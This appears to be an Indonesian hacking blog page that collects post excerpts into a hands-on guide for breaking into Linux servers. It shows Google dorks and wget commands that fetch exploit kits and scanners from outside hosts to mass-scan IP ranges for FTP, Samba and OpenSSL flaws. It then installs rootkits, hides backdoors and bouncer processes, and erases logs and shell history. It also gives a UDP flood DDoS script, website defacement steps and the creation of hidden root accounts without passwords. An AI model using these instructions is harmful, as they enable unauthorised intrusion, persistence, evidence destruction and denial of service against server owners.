Google hacking

======lain sok pinter tapi keur iseng======

pertama : buka google.com 
          allinurl:  cgi/file= .htm  <==< copi masukin ke search google

 Continue reading 'Google hacking'

Local Exploit

Cracking Root
=======================================================

Tips:
mkdir .bash            <----untuk membuat direktori bash
cd .bash                 <---untuk masuk ke direktori bash

mkdir <direktory>  <--- untuk membuat direktory baru

cd <direktory>       <--- untuk masuk ke direktory yg anda mau

cd /                        <--- untuk keluar dari suatu direktory

rm -rf  <file>          <--- untuk menghapus file/direktory

  Continue reading 'Local Exploit'

RootKit

First you need a shell witch you will scan for other shells/roots with this 
scanner: 
wget http://dalnet.bumerang.ro/linux/xpl/wu2.tar.gz 
after you download it, start scaning: 
tar -xzvf wu2.tar.gz 
unpacking the arhive 
cd alpyftpd/ 
./scan 203 21 180 
203 - first IP class 
21 - its necesary, its the FTP port, the exploit its for FTP 
180 - second IP class 
wew

rootkit: 
its a backdoor witch lets you connect to the server throught another port and 
pass set by you.that makes you invisible, hides screen, ps, w, last and all your 
procces. 
wget http://dalnet.bumerang.ro/linux/rk/X.tar.gz 
tar -xzvf X.tar.gz 
unpacking the arhive 
cd X/ 
./install root password port e-mail 
root - its necesary, its the ID 
password - its set the password you want for root 
port - the port you connect through on ssh 
e-mail - your mail to recive the information about the server and your options 
Example: 
./install root dexter 1402 dextervaneza@yahoo.com 
that means you connect to server on port 1402 with id root and password 

ATENTION ::. 
untuk xpost scanner :
liad di bawah ini :
wget http://www.cyberborneo.com/tools/xpost.tgz 
tar -zxvf xpost.tgz 
cd xpost 
cd xwurm 
./scan 200.152 
When scan finished type 
./masswu wu-scan.log 
And if another IP SAY SECCUES u HAVE ROOT ON THIS IP... 
u must to connect on it with awu if u don't have awu then get it 

wget www.geocities.com/blackhat12001/dimi.tgz 
tar -zxvf dimi.tgz 
cd awu 
./wu -a -d IP ( or box so sayed Succes) 

when he coonnect on box 
type: 
cd /dev 
mkdir .p 
cd .p 
wget www.geocities.com/blackhat12001/r00tk1t.tgz 
tar -zxvf r00tk1t.tgz 
cd shv4 
./setup [password] [port] 
port mematikan : 53

remove lOg

198.26.132.121 80 <-- proxy
http://rpmfind.net
http://www.vip-hosting.com<---order Ds by qchex

insstal wget :
=====================
ftp://rpmfind.net/linux/redhat/updates/6.2/en/os/i386/wget-1.8.2-4.6x.i386.rpm
rpm -ivh ftp://rpmfind.net/linux/redhat/updates/6.2/en/os/i386/wget-1.8.2-4.6x.i386.rpms
cara lain :
ftp rpmfind.net
login : anonymous
pass : admin@
cd linux/redhat/6.2/en/os/i386/RedHat/RPMS/
get wget-1.5.3-6.i386.rpm
keluar dari ftp : bye
rpm -ivh wget-1.5.3-6.i386.rpm
finish :)

install pico dan remove.c
================================
ftp://rpmfind.net/linux/redhat/updates/9/en/os/i386/pine-4.44-19.90.0.i386.rpm <-- instal pico 
ftp://rpmfind.net/linux/redhat/9/en/os/i386/RedHat/RPMS/pidentd-3.0.14-11.i386.rpm <---ident
di file etc
yang deafultnyo
ex :buang yang nggak perlu
buang yang ngga perlu di identd.conf
ftp://dajal:p3l3rku@dajal.netfirms.com/www/rem  <---remove.c jejak

----------------------------------------------------------------------------------

Instalasi Pysbnc

mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut
cd "...." <<-- masuk ke direktori 
wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh 
mv psybnc .log
cd .log
make  
echo "PSYBNC.SYSTEM.PORT1=110"  >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] " 
mv scut.conf "  "
"[identd] " "  " 

 .-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-. ,-.,---.,--. ,-.,----.
 | O || ,-' \ \/ / | o || \| || ,--'
 | _/ _\ \ \ / | o< | |\ || |__
 |_| |____/ |__| |___||_| \_| \___|
 Version 2.2.1 (c) 1999-2000  the most psychoid  and the cool lam3rz Group IRCnet
 `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
 Configuration File:
 No logfile specified, logging to log/psybnc.log
 Listening on: 0.0.0.0 port 11111
 psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
 [scut@d11303 .log]$

 ps -x untuk mengetahui proses  di background shell 
 [scut@d11303 .log]$ ps -x
 PID TTY STAT TIME COMMAND
 31544 ? S 0:16 ./bash
 31629 ? S 0:06 sendmail to scut
 2212 pts/1 S 0:00 -bash
 2291 pts/1 S 0:00 [identd]
 2309 pts/1 R 0:00 ps -x
 catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background
 psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan:

find | grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda 
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal 
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

Dengan cara tersebut kemungkinan sang admin nggak akan curiga  terhadap background yang ada di server anda ;) dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Atau bisa juga menggunakan remove.c yang ada di situs k-elektronik :)  selamat mencoba dan ini hanyalah

Tuturial pakai Exploit

Cara I
1. wget http://www.renjana.com/xb.tar.gz 
2. tar -zxvf xb.tar.gz 
3. cd xb 
4. ./xbrute IP
----------------------------------------------------------------------------------
Cara open-ssl :
*
   ./openssl-too-open -a 0x7 -v 
   ./openssl-too-open -a 0x10 -v
   ./openssl-too-open -a 0x14 -v 

./mapache 200 443 10 10
./apache target
----------------------------------------------------------------------------------
cara FTP:
wget pembalap.us/ftp.tgz
tar
cd ftp
./scan ip1 port ip2 ip3
----------------------------------------------------------------------------------
Sambel :

http://www.packetstormsecurity.nl/0304-exploits/sambal.c
gcc -o sambal sambal.c
Scan :
./sambal -d 0 -C 60 -S 192.168.0

Tembak :
./sambal -b 0 -v 192.168.0.133

Klo Dpt :

http://utay-doyan.cc/shv4.tar.gz
tar 
cd
./setup medah 4500 jadi login root ssh port 4500
----------------------------------------------------------------------------------
PATCH

root@redeye samba]# /etc/init.d/smb stop
Shutting down SMB services: [ OK ]
Shutting down NMB services: [ OK ]
[root@redeye root]# cd /etc/samba
[root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz
[root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz
[root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs
[root@redeye samba]# /etc/init.d/smb start
----------------------------------------------------------------------------------
Ddos attack :
wget http://packetstormsecurity.nl/DoS/udp.pl
perl udp.pl target 0 0
----------------------------------------------------------------------------------
Deface
cd /
cd var/www
masuk ke html
wget file index aja disana 
chmod +x index
-------------------------------
echo <-- hapus jejak

masuk di direct root
ls -al
echo <[namafile]
------------------------------------
Add user dlm Root:
1.
/usr/sbin/useradd pembalap -g wheel -s /bin/bash -d /etc/.pembalap
passwd -d pembalap

/usr/sbin/useradd jacky -g wheel -s /bin/bash -d /etc/.jacky
passwd -d jacky

2.
/usr/sbin/adduser pembalap -g root -d /home/pembalap -s /bin/bash
passwd -d pembalap

/usr/sbin/adduser ftp -g root -d /home/jacky -s /bin/bash
passwd -d ftp

/usr/sbin/useradd mailbin -c mail -d /var/spool/mail

**
/usr/sbin/useradd yiping -g root -u 0 -d / 
passwd -d yiping

/usr/sbin/useradd pir -g root -u 0 -d / 
passwd -d pir

/etc/httpd/conf/httpd.conf

/etc/init.d/httpd restart
ok

Del User
/usr/sbin/userdel  Continue reading 'Tuturial pakai Exploit'

IP Sub-Networking Mini-Howto


Robert Hart, hartr@interweft.com.au

v1.1, 30 August 2001


This document describes why and how to subnetwork an IP network – that is using a single A, B or C Class network number to function correctly on several interconnected networks.


Continue reading ‘IP Sub-Networking Mini-Howto’